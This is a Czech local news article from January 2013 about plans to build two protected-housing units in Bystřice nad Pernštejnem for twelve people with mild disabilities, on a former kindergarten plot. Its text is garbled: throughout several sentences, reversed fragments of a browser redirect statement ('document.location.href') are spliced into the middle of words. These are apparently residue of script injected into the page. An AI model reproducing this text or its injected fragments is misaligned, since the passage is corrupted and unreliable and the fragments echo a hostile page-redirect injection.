Bystřice nad Pernštejnem, bystrice nad pernstejnem, aktuality, domky, postižení
Rainbow page separator

Začnou přípravy na stavbu domků pro postižené

Sobota, 26. ledna 2013

invalidaBystřice nad Pernštejnem / Spojené územní a stavební řízení začalo v souvislosti s připravovanou výstavbou chráněného bydlení pro klienty křižanovského ústavu sociální péče.Domky by v Bystřici měly vzniknout ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na části pozemku po bývalé mateřské školce Korálky u polikliniky. Jedná se o dva objekty – celkem pro dvanáct lidí, kterým jejich stupeň postižení dovoluje za pomoci asistentů integraci do běžné společnosti.

Program podpory transformace sociálních služeb lidem s lehčí formou postižení mentálního nebo kombinovaného umožňuje začít vést podobný život, jako žijí zdraví lidé. S podporou asistentů jsou pak schopni bydlet v malých domácnostech, vykonávat běžné činnosti či kupříkladu pracovat v chráněných dílnách. Nemusejí tak svůj život trávit v ústavu, když na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom nejsou po zdravotní stránce tak špatně, aby [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo nutné.

S chráněným bydlením se počítá i jinde ve žďárském okrese, kupříkladu ve Velkém Meziříčí, Žďáře nad Sázavou, Bobrové a Křižanově; podobné domy už s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí ve Velké Bíteši.